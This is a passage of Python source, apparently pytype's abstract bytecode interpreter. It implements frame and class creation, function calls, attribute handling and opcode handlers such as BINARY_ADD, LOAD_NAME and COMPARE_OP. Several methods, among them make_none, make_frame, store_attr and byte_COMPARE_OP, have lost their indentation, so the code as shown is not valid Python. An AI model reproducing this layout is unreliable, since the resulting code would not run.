      # Already abstract: just wrap it in a variable at the root node.
      return pyval.to_variable(self.root_cfg_node, name)
    elif isinstance(pyval, dict):
      # Dicts become lazy values so member conversion is deferred until the
      # member is actually accessed.
      value = abstract.LazyAbstractOrConcreteValue(
          name,
          pyval,  # for class members
          member_map=pyval,
          resolver=self.maybe_convert_constant,
          vm=self)
      value.set_attribute(self.root_cfg_node, "__class__", self.dict_type)
      return value.to_variable(self.root_cfg_node, name)
    else:
      return self.convert_constant(name, pyval)
def make_none(self, node):
none = self.none.to_variable(node, "None")
assert self.is_none(none)
return none
  def make_class(self, node, name_var, bases, class_dict_var):
    """Create a class with the name, bases and methods given.
    Args:
      node: The current CFG node.
      name_var: Class name.
      bases: Base classes.
      class_dict_var: Members of the class, as a Variable containing an
        abstract.Dict value.
    Returns:
      An instance of Class.
    """
    name = _get_atomic_python_constant(name_var)
    log.info("Declaring class %s", name)
    try:
      class_dict = _get_atomic_value(class_dict_var)
    except ConversionError:
      # The class body was ambiguous; fall back to an unknown value.
      log.error("Error initializing class %r", name)
      return self.create_new_unknown(node, name)
    val = abstract.InterpreterClass(
        name,
        list(_get_atomic_python_constant(bases)),
        class_dict.members,
        self)
    var = self.program.NewVariable(name)
    # The class value's origins are the bases plus the class dict.
    var.AddValue(val, bases.values + class_dict_var.values, node)
    return var
  def make_function(self, name, code, globs, defaults, closure=None):
    """Create a function or closure given the arguments."""
    if closure:
      closure = tuple(c for c in _get_atomic_python_constant(closure))
      log.info("closure: %r", closure)
    if not name:
      # Synthesize a display name from the code object when none was given.
      if _get_atomic_python_constant(code).co_name:
        name = "<function:%s>" % _get_atomic_python_constant(code).co_name
      else:
        name = "<lambda>"
    val = abstract.InterpreterFunction.make_function(
        name, code=_get_atomic_python_constant(code),
        f_locals=self.frame.f_locals, f_globals=globs,
        defaults=defaults, closure=closure, vm=self)
    # TODO(ampere): What else needs to be an origin in this case? Probably stuff
    # in closure.
    var = self.program.NewVariable(name)
    var.AddValue(val, code.values, self.root_cfg_node)
    return var
def make_frame(self, node, code, callargs=None,
f_globals=None, f_locals=None, closure=None):
"""Create a new frame object, using the given args, globals and locals."""
if any(code is f.f_code for f in self.frames):
log.info("Detected recursion in %s", code.co_name or code.co_filename)
raise RecursionException()
log.info("make_frame: callargs=%s, f_globals=[%s@%x], f_locals=[%s@%x]",
self.repper(callargs),
type(f_globals).__name__, id(f_globals),
type(f_locals).__name__, id(f_locals))
if f_globals is not None:
f_globals = f_globals
assert f_locals
else:
assert not self.frames
assert f_locals is None
# TODO(ampere): __name__, __doc__, __package__ below are not correct
f_globals = f_locals = self.convert_locals_or_globals({
"__builtins__": self.vmbuiltins,
"__name__": "__main__",
"__doc__": None,
"__package__": None,
})
# Implement NEWLOCALS flag. See Objects/frameobject.c in CPython.
if code.co_flags & loadmarshal.CodeType.CO_NEWLOCALS:
f_locals = self.convert_locals_or_globals({}, "locals")
return frame_state.Frame(node, self, code, f_globals, f_locals,
self.frame, callargs or {}, closure)
def is_none(self, value):
"""Checks whether a value is considered to be "None".
Important for stack values, which might be a symbolic None.
Arguments:
value: A typegraph.Variable.
Returns:
Whether the value is None. False if it isn't or if we don't know.
"""
try:
return value is None or _get_atomic_python_constant(value) is None
except ConversionError:
return False
def push_abstract_exception(self, state):
tb = self.program.NewVariable("tb", [], [], state.node)
value = self.program.NewVariable("value", [], [], state.node)
exctype = self.program.NewVariable("exctype", [], [], state.node)
return state.push(tb, value, exctype)
  def resume_frame(self, frame):
    """Resume a (generator) frame: not implemented, always StopIteration."""
    # TODO(kramm): The concrete interpreter did this:
    # frame.f_back = self.frame
    # log.info("resume_frame: %r", frame)
    # val = self.run_frame(frame)
    # frame.f_back = None
    # return val
    raise StopIteration()
  def backtrace(self):
    """Return a one-line textual summary of the active frame stack."""
    items = []
    for f in self.frames:
      block = self.cfg.get_basic_block(f.f_code, f.f_lasti)
      if block in f.cfgnode:
        # Basic block already has an associated CFG node.
        cfg_node = f.cfgnode[block]
        items.append("[%d %s]" % (cfg_node.id, cfg_node.name))
      else:
        items.append("{%s}" % block.get_name())
    return " ".join(items)
  def compile_src(self, src, filename=None):
    """Compile source text to an ordered-blocks code object."""
    code = pyc.compile_src(
        src, python_version=self.python_version, filename=filename)
    return blocks.process_code(code)
  def run_bytecode(self, node, code, f_globals=None, f_locals=None):
    """Execute one code object in a fresh frame; return node/globals/locals."""
    frame = self.make_frame(node, code, f_globals=f_globals, f_locals=f_locals)
    node, _ = self.run_frame(frame, node)
    # Both checks below guard interpreter invariants, not user errors.
    if self.frames:  # pragma: no cover
      raise VirtualMachineError("Frames left over!")
    if self.frame is not None and self.frame.data_stack:  # pragma: no cover
      raise VirtualMachineError("Data left on stack!")
    return node, frame.f_globals, frame.f_locals
  def preload_builtins(self, node):
    """Parse __builtin__.py and return the definitions as a globals dict."""
    if self.pybuiltins_filename:
      # An explicit builtins file overrides the bundled source.
      with open(self.pybuiltins_filename, "rb") as fi:
        src = fi.read()
    else:
      src = builtins.GetBuiltinsCode(self.python_version)
    builtins_code = self.compile_src(src)
    node, f_globals, f_locals = self.run_bytecode(node, builtins_code)
    # at the outer layer, locals are the same as globals
    builtin_names = frozenset(f_globals.members)
    return node, f_globals, f_locals, builtin_names
  def run_program(self, src, filename=None, run_builtins=True):
    """Run the code and return the CFG nodes.
    This function loads in the builtins and puts them ahead of `code`,
    so all the builtins are available when processing `code`.
    Args:
      src: The program source code.
      filename: The filename the source is from.
      run_builtins: Whether to preload the native Python builtins.
    Returns:
      A tuple (CFGNode, set) containing the last CFGNode of the program as
      well as all the top-level names defined by it.
    """
    node = self.root_cfg_node.ConnectNew("builtins")
    if run_builtins:
      node, f_globals, f_locals, builtin_names = self.preload_builtins(node)
    else:
      node, f_globals, f_locals, builtin_names = node, None, None, frozenset()
    code = self.compile_src(src, filename=filename)
    node = node.ConnectNew("init")
    node, f_globals, _ = self.run_bytecode(node, code, f_globals, f_locals)
    log.info("Final node: <%d>%s", node.id, node.name)
    return node, f_globals.members, builtin_names
  def call_binary_operator(self, state, name, x, y):
    """Map a binary operator to "magic methods" (__add__ etc.)."""
    # TODO(pludemann): See TODO.txt for more on reverse operator subtleties.
    results = []
    log.debug("Calling binary operator %s", name)
    try:
      state, attr = self.load_attr(state, x, name)
    except exceptions.ByteCodeAttributeError:  # from load_attr
      log.info("Failed to find %s on %r", name, x, exc_info=True)
    else:
      state, ret = self.call_function_with_state(state, attr, [y],
                                                 fallback_to_unsolvable=False)
      results.append(ret)
    rname = self.reverse_operator_name(name)
    if self.reverse_operators and rname:
      # Also try the reflected operator on the right operand (__radd__ etc.).
      try:
        state, attr = self.load_attr(state, y, rname)
      except exceptions.ByteCodeAttributeError:
        log.debug("No reverse operator %s on %r",
                  self.reverse_operator_name(name), y)
      else:
        state, ret = self.call_function_with_state(state, attr, [x],
                                                   fallback_to_unsolvable=False)
        results.append(ret)
    log.debug("Results: %r", results)
    # Merge forward and reverse results into a single variable.
    return state, self.join_variables(state.node, name, results)
def binary_operator(self, state, name):
state, (x, y) = state.popn(2)
state, ret = self.call_binary_operator(state, name, x, y)
return state.push(ret)
def inplace_operator(self, state, name):
state, (x, y) = state.popn(2)
state, ret = self.call_binary_operator(state, name, x, y)
return state.push(ret)
  def trace_unknown(self, *args):
    """Fired whenever we create a variable containing 'Unknown'."""
    # Default hook: NotImplemented signals that no tracer is attached.
    return NotImplemented
  def trace_call(self, *args):
    """Fired whenever we call a builtin using unknown parameters."""
    # Default hook: NotImplemented signals that no tracer is attached.
    return NotImplemented
def call_function_with_state(self, state, funcu, posargs, namedargs=None,
starargs=None, fallback_to_unsolvable=True):
node, ret = self.call_function(
state.node, funcu, posargs, namedargs, starargs, fallback_to_unsolvable)
return state.change_cfg_node(node), ret
  def call_function(self, node, funcu, posargs, namedargs=None,
                    starargs=None, fallback_to_unsolvable=True):
    """Call a function.
    Args:
      node: The current CFG node.
      funcu: A variable of the possible functions to call.
      posargs: The known positional arguments to pass (as variables).
      namedargs: The known keyword arguments to pass. dict of str -> Variable.
      starargs: The contents of the *args parameter, if passed. (None otherwise)
      fallback_to_unsolvable: If the function call fails, create an unknown.
    Returns:
      A tuple (CFGNode, Variable). The Variable is the return value.
    """
    assert funcu.values
    result = self.program.NewVariable("<return:%s>" % funcu.name)
    nodes = []
    error = None
    # Call every possible binding of the function variable and merge results.
    for funcv in funcu.values:
      func = funcv.data
      assert isinstance(func, abstract.AtomicAbstractValue), type(func)
      try:
        new_node, one_result = func.call(
            node, funcv, posargs, namedargs or {}, starargs)
      except abstract.FailedFunctionCall as e:
        # Remember only the first failure for reporting.
        error = error or e
      else:
        result.PasteVariable(one_result, new_node)
        nodes.append(new_node)
    if nodes:
      return self.join_cfg_nodes(nodes), result
    else:
      if fallback_to_unsolvable:
        assert error
        log.error("FailedFunctionCall for %s", error.obj)
        for msg in error.explanation_lines:
          log.error("... %s", msg)
        return node, self.create_new_unsolvable(node, "failed call")
      else:
        # We were called by something that returns errors, so don't report
        # the failed call.
        return node, result
  def call_function_from_stack(self, state, arg, args, kwargs=None):
    """Pop arguments for a function and call it."""
    # CALL_FUNCTION encodes counts as (num_kw << 8) | num_pos.
    num_kw, num_pos = divmod(arg, 256)
    # TODO(kramm): Can we omit creating this dict if kwargs=None and num_kw=0?
    namedargs = abstract.Dict("kwargs", self)
    for _ in range(num_kw):
      state, (key, val) = state.popn(2)
      namedargs.setitem(state.node, key, val)
    if kwargs:
      for v in kwargs.data:
        namedargs.update(state.node, v)
    state, posargs = state.popn(num_pos)
    posargs = list(posargs)
    posargs.extend(args)
    state, func = state.pop()
    state, ret = self.call_function_with_state(state, func, posargs, namedargs)
    state = state.push(ret)
    return state
  def load_constant(self, value):
    """Converts a Python value to an abstract value."""
    return self.convert_constant(type(value).__name__, value)
  def get_globals_dict(self):
    """Get a real python dict of the globals."""
    return self.frame.f_globals
  def load_from(self, state, store, name):
    """Load `name` from the given attribute store, threading the CFG node.

    Raises KeyError if the store has no such attribute.
    """
    node = state.node
    node, exists = store.has_attribute(node, name)
    assert isinstance(node, typegraph.CFGNode)
    if not exists:
      raise KeyError(name)
    node, attr = store.get_attribute(node, name)
    assert isinstance(node, typegraph.CFGNode)
    state = state.change_cfg_node(node)
    return state, attr
  def load_local(self, state, name):
    """Called when a local is loaded onto the stack.
    Uses the name to retrieve the value from the current locals().
    Args:
      state: The current VM state.
      name: Name of the local
    Returns:
      The value (typegraph.Variable)
    """
    return self.load_from(state, self.frame.f_locals, name)
  def load_global(self, state, name):
    """Load a name from the current frame's globals."""
    return self.load_from(state, self.frame.f_globals, name)
  def load_builtin(self, state, name):
    """Load a name from the builtins namespace."""
    if name == "__any_object__":
      # for type_inferencer/tests/test_pgms/*.py
      return state, abstract.Unknown(self).to_variable(state.node, name)
    return self.load_from(state, self.frame.f_builtins, name)
  def store_local(self, state, name, value):
    """Called when a local is written."""
    assert isinstance(value, typegraph.Variable), (name, repr(value))
    node = self.frame.f_locals.set_attribute(state.node, name, value)
    return state.change_cfg_node(node)
  def store_global(self, state, name, value):
    """Same as store_local except for globals."""
    assert isinstance(value, typegraph.Variable)
    node = self.frame.f_globals.set_attribute(state.node, name, value)
    return state.change_cfg_node(node)
  def del_local(self, name):
    """Called when a local is deleted."""
    # TODO(ampere): Implement locals removal or decide not to.
    log.warning("Local variable removal does not actually do "
                "anything in the abstract interpreter")
  def get_attr(self, node, obj, attr, allow_descriptors=True):
    """Load an attribute from an object."""
    assert isinstance(obj, typegraph.Variable), obj
    # Resolve the value independently for each value of obj
    result = self.program.NewVariable(str(attr))
    log.debug("getting attr %s from %r", attr, obj)
    nodes = []
    for val in obj.Values(node):
      node2, exists = val.data.has_attribute(node, attr, val)
      if not exists:
        log.debug("No %s on %s", attr, val.data.__class__)
        continue
      node2, attr_var = val.data.get_attribute(node2, attr, val)
      log.debug("got choice for attr %s from %r of %r (0x%x): %r", attr, obj,
                val.data, id(val.data), attr_var)
      if not attr_var:
        continue
      # Loop over the values to check for properties
      if allow_descriptors:
        # TODO(kramm): Descriptor logic should go into abstract.Class.
        for v in attr_var.Values(node2):
          value = v.data
          node3, has_getter = value.has_attribute(node2, "__get__")
          if has_getter:
            # Descriptor: call __get__ and collect what it returns.
            node3, getter = value.get_attribute(node2, "__get__", v)
            node3, get_result = self.call_function(
                node3, getter, [getter, value.get_class()])
            for getter in get_result.values:
              result.AddValue(getter.data, [getter], node3)
          else:
            result.AddValue(value, [v], node3)
          nodes.append(node3)
      else:
        result.PasteVariable(attr_var, node2)
        nodes.append(node2)
    if not result.values:
      raise exceptions.ByteCodeAttributeError("No such attribute %s" % attr)
    return self.join_cfg_nodes(nodes), result
def load_attr(self, state, obj, attr, allow_descriptors=True):
node, result = self.get_attr(state.node, obj, attr, allow_descriptors)
return state.change_cfg_node(node), result
def store_attr(self, state, obj, attr, value):
"""Same as load_attr except for setting attributes."""
assert isinstance(obj, typegraph.Variable)
assert isinstance(attr, str)
assert isinstance(value, typegraph.Variable)
nodes = []
for val in obj.values:
# TODO(kramm): Check whether val.data is a descriptor (i.e. has "__set__")
nodes.append(val.data.set_attribute(state.node, attr, value))
return state.change_cfg_node(
self.join_cfg_nodes(nodes))
  def del_attr(self, state, obj, attr):
    """Same as load_attr except for deleting attributes."""
    # TODO(kramm): Store abstract.Nothing
    # Deletion is deliberately a no-op in the abstract interpreter.
    log.warning("Attribute removal does not actually do "
                "anything in the abstract interpreter")
    return state
def build_bool(self, node, value=None):
if value is None:
name, val = "bool", self.primitive_class_instances[bool]
elif value is True:
name, val = "True", self.true_value
elif value is False:
name, val = "False", self.false_value
else:
raise ValueError("Invalid bool value: %r", value)
return val.to_variable(node, name)
  def build_string(self, node, s):
    """Create a variable for the string constant `s`."""
    return self.convert_constant(repr(s), s)
  def build_content(self, node, elements):
    """Merge a sequence of variables into one "<elements>" variable."""
    var = self.program.NewVariable("<elements>")
    for v in elements:
      var.PasteVariable(v, node)
    return var
  def build_slice(self, node, start, stop, step=None):
    """Create a slice variable; start/stop/step are deliberately ignored."""
    return self.primitive_class_instances[slice].to_variable(node, "slice")
  def tuple_to_value(self, node, content):
    """Create a VM tuple from the given sequence."""
    content = tuple(content)  # content might be a generator
    value = abstract.AbstractOrConcreteValue(
        content, self.tuple_type, self)
    # The "T" type parameter is the union of all element types.
    value.initialize_type_parameter(node, "T",
                                    self.build_content(node, content))
    return value
  def build_tuple(self, node, content):
    """Create a VM tuple from the given sequence."""
    return self.tuple_to_value(node, content).to_variable(node, name="tuple")
  def build_list(self, node, content):
    """Create a VM list from the given sequence."""
    content = list(content)  # content might be a generator
    value = abstract.Instance(self.list_type, self)
    value.initialize_type_parameter(node, "T",
                                    self.build_content(node, content))
    return value.to_variable(node, name="list(...)")
  def build_set(self, node, content):
    """Create a VM set from the given sequence."""
    content = list(content)  # content might be a generator
    value = abstract.Instance(self.set_type, self)
    value.initialize_type_parameter(node, "T",
                                    self.build_content(node, content))
    return value.to_variable(node, name="set(...)")
  def build_map(self, node):
    """Create an empty VM dict."""
    return abstract.Dict("dict()", self).to_variable(node, "dict()")
def push_last_exception(self, state):
log.info("Pushing exception %r", state.exception)
exctype, value, tb = state.exception
return state.push(tb, value, exctype)
  def del_subscr(self, state, obj, subscr):
    """Delete obj[subscr]; a deliberate no-op in the abstract interpreter."""
    log.warning("Subscript removal does not actually do "
                "anything in the abstract interpreter")
    # TODO(kramm): store abstract.Nothing
    return state
  def pop_varargs(self, state):
    """Retrieve a varargs tuple from the stack. Used by call_function."""
    state, args_var = state.pop()
    try:
      args = _get_atomic_python_constant(args_var)
      if not isinstance(args, tuple):
        raise ConversionError(type(args))
    except ConversionError:
      # If the *args parameter is non-trivial, just try calling with no
      # arguments.
      # TODO(kramm): When calling a method, we should instead insert Unknown for
      # all parameters that are not otherwise set.
      log.error("Unable to resolve positional arguments: *%s", args_var.name)
      args = []
    return state, args
  def pop_kwargs(self, state):
    """Retrieve a kwargs dictionary from the stack. Used by call_function."""
    return state.pop()
  def convert_locals_or_globals(self, d, name="globals"):
    """Wrap a plain dict of members as a lazily-converted namespace value."""
    return abstract.LazyAbstractValue(
        name, d, self.maybe_convert_constant, self)
  # TODO(kramm): memoize
  def import_module(self, name, level):
    """Import the module and return the module object."""
    if name:
      # Absolute import.
      assert level <= 0
      ast = self.loader.import_name(name)
    else:
      # Relative import (level gives how many packages up).
      assert level > 0
      ast = self.loader.import_relative(level)
    if ast:
      members = {val.name.rsplit(".")[-1]: val
                 for val in ast.constants + ast.classes + ast.functions}
      return abstract.Module(self, ast.name, members)
    else:
      return None
  def print_item(self, item, to=None):
    # We don't need do anything here, since Python's print function accepts
    # any type. (We could exercise the __str__ method on item - but every
    # object has a __str__, so we wouldn't learn anything from that.)
    pass
  def print_newline(self, to=None):
    # No-op; see print_item.
    pass
def unary_operator(self, state, name):
state, x = state.pop()
state, method = self.load_attr(state, x, name) # E.g. __not__
state, result = self.call_function_with_state(state, method, [], {})
state = state.push(result)
return state
def byte_UNARY_NOT(self, state):
state = state.pop_and_discard()
state = state.push(self.build_bool(state.node))
return state
  # Thin opcode dispatchers: each maps a unary/binary opcode to the
  # corresponding magic-method name.
  def byte_UNARY_CONVERT(self, state):
    return self.unary_operator(state, "__repr__")
  def byte_UNARY_NEGATIVE(self, state):
    return self.unary_operator(state, "__neg__")
  def byte_UNARY_POSITIVE(self, state):
    return self.unary_operator(state, "__pos__")
  def byte_UNARY_INVERT(self, state):
    return self.unary_operator(state, "__invert__")
  def byte_BINARY_ADD(self, state):
    return self.binary_operator(state, "__add__")
  def byte_BINARY_SUBTRACT(self, state):
    return self.binary_operator(state, "__sub__")
  def byte_BINARY_DIVIDE(self, state):
    return self.binary_operator(state, "__div__")
  def byte_BINARY_MULTIPLY(self, state):
    return self.binary_operator(state, "__mul__")
  def byte_BINARY_MODULO(self, state):
    return self.binary_operator(state, "__mod__")
  def byte_BINARY_LSHIFT(self, state):
    return self.binary_operator(state, "__lshift__")
  def byte_BINARY_RSHIFT(self, state):
    return self.binary_operator(state, "__rshift__")
  def byte_BINARY_AND(self, state):
    return self.binary_operator(state, "__and__")
  def byte_BINARY_XOR(self, state):
    return self.binary_operator(state, "__xor__")
  def byte_BINARY_OR(self, state):
    return self.binary_operator(state, "__or__")
  def byte_BINARY_FLOOR_DIVIDE(self, state):
    return self.binary_operator(state, "__floordiv__")
  def byte_BINARY_TRUE_DIVIDE(self, state):
    return self.binary_operator(state, "__truediv__")
  def byte_BINARY_POWER(self, state):
    return self.binary_operator(state, "__pow__")
  def byte_BINARY_SUBSCR(self, state):
    """obj[index]: dispatch to __getitem__; fail if nothing was retrieved."""
    state = self.binary_operator(state, "__getitem__")
    if state.top().values:
      return state
    else:
      raise exceptions.ByteCodeIndexError(
          "Couldn't retrieve item out of container")
def byte_INPLACE_ADD(self, state):
return self.binary_operator(state, "__iadd__")
  # In-place opcode dispatchers (x -= y etc.) mapped to their __i*__ methods.
  def byte_INPLACE_SUBTRACT(self, state):
    return self.inplace_operator(state, "__isub__")
  def byte_INPLACE_MULTIPLY(self, state):
    return self.inplace_operator(state, "__imul__")
  def byte_INPLACE_DIVIDE(self, state):
    return self.inplace_operator(state, "__idiv__")
  def byte_INPLACE_MODULO(self, state):
    return self.inplace_operator(state, "__imod__")
  def byte_INPLACE_POWER(self, state):
    return self.inplace_operator(state, "__ipow__")
  def byte_INPLACE_LSHIFT(self, state):
    return self.inplace_operator(state, "__ilshift__")
  def byte_INPLACE_RSHIFT(self, state):
    return self.inplace_operator(state, "__irshift__")
  def byte_INPLACE_AND(self, state):
    return self.inplace_operator(state, "__iand__")
  def byte_INPLACE_XOR(self, state):
    return self.inplace_operator(state, "__ixor__")
  def byte_INPLACE_OR(self, state):
    return self.inplace_operator(state, "__ior__")
  def byte_INPLACE_FLOOR_DIVIDE(self, state):
    return self.inplace_operator(state, "__ifloordiv__")
  def byte_INPLACE_TRUE_DIVIDE(self, state):
    return self.inplace_operator(state, "__itruediv__")
def byte_LOAD_CONST(self, state, op):
const = self.frame.f_code.co_consts[op.arg]
return state.push(self.load_constant(const))
  # Pure stack-manipulation opcodes.
  def byte_POP_TOP(self, state):
    return state.pop_and_discard()
  def byte_DUP_TOP(self, state):
    return state.push(state.top())
  def byte_DUP_TOPX(self, state, op):
    # Duplicate the top op.arg items, preserving their order.
    state, items = state.popn(op.arg)
    state = state.push(*items)
    state = state.push(*items)
    return state
  def byte_DUP_TOP_TWO(self, state):
    # Py3 only
    state, (a, b) = state.popn(2)
    return state.push(a, b, a, b)
  def byte_ROT_TWO(self, state):
    state, (a, b) = state.popn(2)
    return state.push(b, a)
  def byte_ROT_THREE(self, state):
    state, (a, b, c) = state.popn(3)
    return state.push(c, a, b)
  def byte_ROT_FOUR(self, state):
    state, (a, b, c, d) = state.popn(4)
    return state.push(d, a, b, c)
  def byte_LOAD_NAME(self, state, op):
    """Load a name. Can be a local, global, or builtin."""
    name = self.frame.f_code.co_names[op.arg]
    # Lookup order mirrors CPython: locals, then globals, then builtins.
    try:
      state, val = self.load_local(state, name)
    except KeyError:
      try:
        state, val = self.load_global(state, name)
      except KeyError:
        try:
          state, val = self.load_builtin(state, name)
        except KeyError:
          raise exceptions.ByteCodeNameError("name '%s' is not defined" % name)
    return state.push(val)
  def byte_STORE_NAME(self, state, op):
    """Pop a value and bind it to a (local) name."""
    name = self.frame.f_code.co_names[op.arg]
    state, value = state.pop()
    state = self.store_local(state, name, value)
    return state
  def byte_DELETE_NAME(self, state, op):
    """Delete a name binding (a no-op; see del_local)."""
    name = self.frame.f_code.co_names[op.arg]
    self.del_local(name)
    return state
  def byte_LOAD_FAST(self, state, op):
    """Load a local. Unlike LOAD_NAME, it doesn't fall back to globals."""
    name = self.frame.f_code.co_varnames[op.arg]
    try:
      state, val = self.load_local(state, name)
    except KeyError:
      raise exceptions.ByteCodeUnboundLocalError(
          "local variable '%s' referenced before assignment" % name
      )
    return state.push(val)
  def byte_STORE_FAST(self, state, op):
    """Pop a value and store it in a fast local slot."""
    name = self.frame.f_code.co_varnames[op.arg]
    state, value = state.pop()
    # New CFG node so later loads can distinguish this assignment.
    state = state.forward_cfg_node()
    state = self.store_local(state, name, value)
    return state
  def byte_DELETE_FAST(self, state, op):
    """Delete a fast local (a no-op; see del_local)."""
    name = self.frame.f_code.co_varnames[op.arg]
    self.del_local(name)
    return state
  def byte_LOAD_GLOBAL(self, state, op):
    """Load a global variable, or fall back to trying to load a builtin."""
    name = self.frame.f_code.co_names[op.arg]
    try:
      state, val = self.load_global(state, name)
    except KeyError:
      try:
        state, val = self.load_builtin(state, name)
      except KeyError:
        raise exceptions.ByteCodeNameError(
            "global name '%s' is not defined" % name)
    return state.push(val)
def byte_STORE_GLOBAL(self, state, op):
name = self.frame.f_code.co_names[op.arg]
state, value = state.pop()
state = self.store_global(state, name, value)
return state
  def byte_LOAD_CLOSURE(self, state, op):
    """Used to generate the 'closure' tuple for MAKE_CLOSURE.
    Each entry in that tuple is typically retrieved using LOAD_CLOSURE.
    Args:
      state: The current VM state.
      op: The opcode. op.arg is the index of a "cell variable": This corresponds
        to an entry in co_cellvars or co_freevars and is a variable that's bound
        into a closure.
    Returns:
      A new state.
    """
    return state.push(self.frame.cells[op.arg])
  def byte_LOAD_DEREF(self, state, op):
    """Retrieves a value out of a cell."""
    # Since we're working on typegraph.Variable, we don't need to dereference.
    return state.push(self.frame.cells[op.arg])
  def byte_STORE_DEREF(self, state, op):
    """Stores a value in a closure cell."""
    state, value = state.pop()
    assert isinstance(value, typegraph.Variable)
    # Merge the stored value into the existing cell variable.
    self.frame.cells[op.arg].PasteVariable(value, state.node)
    return state
  def byte_LOAD_LOCALS(self, state):
    """Push the current frame's locals as a dict-like variable."""
    log.debug("Returning locals: %r", self.frame.f_locals)
    locals_dict = self.maybe_convert_constant("locals", self.frame.f_locals)
    return state.push(locals_dict)
def byte_COMPARE_OP(self, state, op):
"""Pops and compares the top two stack values and pushes a boolean."""
state, (x, y) = state.popn(2)
# Explicit, redundant, switch statement, to make it easier to address the
# behavior of individual compare operations:
if op.arg == slots.CMP_LT:
state, ret = self.call_binary_operator(state, "__lt__", x, y)
elif op.arg == slots.CMP_LE:
state, ret = self.call_binary_operator(state, "__le__", x, y)
elif op.arg == slots.CMP_EQ:
state, ret = self.call_binary_operator(state, "__eq__", x, y)
elif op.arg == slots.CMP_NE:
state, ret = self.call_binary_operator(state, "__ne__", x, y)
elif op.arg == slots.CMP_GT:
state, ret = self.call_binary_operator(state, "__gt__", x, y)
elif op.arg == slots.CMP_GE:
state, ret = self.call_binary_operator(state, "__ge__", x, y)
elif op.arg == slots.CMP_IS:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_IS_NOT:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_NOT_IN:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_IN:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_EXC_MATCH:
ret = self.build_bool(state.node)
else:
raise VirtualMachineError("Invalid argument to COMPARE_OP: %d", op.arg)
return state.push(ret)
  def byte_LOAD_ATTR(self, state, op):
    """Pop an object, and retrieve a named attribute from it."""
    name = self.frame.f_code.co_names[op.arg]
    state, obj = state.pop()
    log.info("LOAD_ATTR: %r %s", type(obj), name)
    try:
      state, val = self.load_attr(state, obj, name)
    except exceptions.ByteCodeAttributeError:
      # Missing attribute: push an unsolvable instead of failing analysis.
      log.error("No such attribute %s", name)
      state = state.push(self.create_new_unsolvable(state.node, "bad attr"))
    else:
      state = state.push(val)
    return state
  def byte_STORE_ATTR(self, state, op):
    """Pop (value, object) and set the named attribute on the object."""
    name = self.frame.f_code.co_names[op.arg]
    state, (val, obj) = state.popn(2)
    # New CFG node so the store is distinguishable from earlier state.
    state = state.forward_cfg_node()
    state = self.store_attr(state, obj, name, val)
    return state
  def byte_DELETE_ATTR(self, state, op):
    """Delete an attribute (a no-op; see del_attr)."""
    name = self.frame.f_code.co_names[op.arg]
    state, obj = state.pop()
    return self.del_attr(state, obj, name)
  def store_subscr(self, state, obj, key, val):
    """obj[key] = val, implemented via the object's __setitem__."""
    state, f = self.load_attr(state, obj, "__setitem__")
    state, _ = self.call_function_with_state(state, f, [key, val], {})
    return state
  def byte_STORE_SUBSCR(self, state):
    """Pop (value, object, subscript) and perform object[subscript] = value."""
    state, (val, obj, subscr) = state.popn(3)
    state = state.forward_cfg_node()
    state = self.store_subscr(state, obj, subscr, val)
    return state
  def byte_DELETE_SUBSCR(self, state):
    """del obj[subscr] (a no-op; see del_subscr)."""
    state, (obj, subscr) = state.popn(2)
    return self.del_subscr(state, obj, subscr)
  def byte_BUILD_TUPLE(self, state, op):
    """Pop op.arg elements and push a tuple of them."""
    count = op.arg
    state, elts = state.popn(count)
    return state.push(self.build_tuple(state.node, elts))
  def byte_BUILD_LIST(self, state, op):
    """Pop op.arg elements and push a list of them."""
    count = op.arg
    state, elts = state.popn(count)
    return state.push(self.build_list(state.node, elts))
  def byte_BUILD_SET(self, state, op):
    """Pop op.arg elements and push a set of them."""
    count = op.arg
    state, elts = state.popn(count)
    return state.push(self.build_set(state.node, elts))
  def byte_BUILD_MAP(self, state, op):
    """Push an empty dict; entries are added later via STORE_MAP."""
    # op.arg (size) is ignored.
    return state.push(self.build_map(state.node))
  def byte_STORE_MAP(self, state):
    """Pop (map, val, key), set map[key] = val, and push the map back."""
    state, (the_map, val, key) = state.popn(3)
    state = self.store_subscr(state, the_map, key, val)
    return state.push(the_map)
  def byte_UNPACK_SEQUENCE(self, state, op):
    """Pop an iterable and push its op.arg elements, last element first."""
    state, seq = state.pop()
    state, f = self.load_attr(state, seq, "__iter__")
    state, itr = self.call_function_with_state(state, f, [], {})
    values = []
    for _ in range(op.arg):
      # TODO(ampere): Fix for python 3
      state, f = self.load_attr(state, itr, "next")
      state, result = self.call_function_with_state(state, f, [], {})
      values.append(result)
    # Push in reverse so the first element ends up on top of the stack,
    # matching CPython's UNPACK_SEQUENCE semantics.
    for value in reversed(values):
      state = state.push(value)
    return state
  def byte_BUILD_SLICE(self, state, op):
    """Pop 2 or 3 values (per op.arg) and push a slice object."""
    if op.arg == 2:
      state, (x, y) = state.popn(2)
      return state.push(self.build_slice(state.node, x, y))
    elif op.arg == 3:
      state, (x, y, z) = state.popn(3)
      return state.push(self.build_slice(state.node, x, y, z))
    else:       # pragma: no cover
      # CPython only emits BUILD_SLICE with arg 2 or 3.
      raise VirtualMachineError("Strange BUILD_SLICE count: %r" % op.arg)
  def byte_LIST_APPEND(self, state, op):
    """Append TOS to the list op.arg entries down the stack."""
    # Used by the compiler e.g. for [x for x in ...]
    count = op.arg
    state, val = state.pop()
    the_list = state.peek(count)  # the list stays on the stack
    state, f = self.load_attr(state, the_list, "append")
    state, _ = self.call_function_with_state(state, f, [val], {})
    return state
  def byte_SET_ADD(self, state, op):
    """Add TOS to the set op.arg entries down the stack."""
    # Used by the compiler e.g. for {x for x in ...}
    count = op.arg
    state, val = state.pop()
    the_set = state.peek(count)  # the set stays on the stack
    state, f = self.load_attr(state, the_set, "add")
    state, _ = self.call_function_with_state(state, f, [val], {})
    return state
  def byte_MAP_ADD(self, state, op):
    """Pop (val, key) and store them into the dict op.arg entries down."""
    # Used by the compiler e.g. for {x: y for x, y in ...}
    count = op.arg
    state, (val, key) = state.popn(2)
    the_map = state.peek(count)  # the dict stays on the stack
    state, f = self.load_attr(state, the_map, "__setitem__")
    state, _ = self.call_function_with_state(state, f, [key, val], {})
    return state
  def byte_PRINT_EXPR(self, state):
    """Discard TOS; the printing itself has no effect on analysis."""
    # Only used in the interactive interpreter, not in modules.
    return state.pop_and_discard()
  def byte_PRINT_ITEM(self, state):
    """Pop an item and record it as printed (py2 print statement)."""
